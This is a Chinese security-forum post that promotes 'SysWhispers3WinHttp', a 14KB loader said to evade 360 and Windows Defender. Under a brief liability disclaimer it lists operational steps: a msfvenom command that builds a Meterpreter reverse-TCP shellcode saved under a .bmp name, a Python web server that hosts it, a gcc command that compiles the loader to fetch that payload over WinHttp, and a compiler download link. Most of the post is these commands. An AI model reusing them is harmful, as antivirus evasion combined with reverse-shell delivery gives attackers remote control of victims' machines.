安全矩阵

 找回密码
 立即注册
搜索
查看: 552|回复: 0

免杀工具 -- SysWhispers3WinHttp

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-4-7 20:37:21 | 显示全部楼层 |阅读模式
转载于:determinasc Web安全工具库

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。


0x01 工具介绍

SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译,文件大小14KB,可免杀绕过360核晶防护与Defender。

0x02 安装与使用
1、使用msfvenom生成shellcode(或使用CobaltStrike生成Stageless之shellcode)

  1. msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o test.bmp
复制代码
2、使用python3开启Web服务(或使用CobaltStrike之Scripted Web Delivery功能)
  1. python3 -m http.server
复制代码
3、修改SysWhispers3WinHttp.c 第40行IP地址并使用32位GCC进行编译
  1. gcc .\syscalls.c .\SysWhispers3WinHttp.c -o .\SysWhispers3WinHttp.exe -masm=intel -fpermissive -w -s -lwinhttp
复制代码
4、32位GCC下载地址
  1. https://master.dl.sourceforge.net/project/mingw-w64/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/6.4.0/threads-win32/sjlj/i686-6.4.0-release-win32-sjlj-rt_v5-rev0.7z?viasf=1
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 23:08 , Processed in 0.015485 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表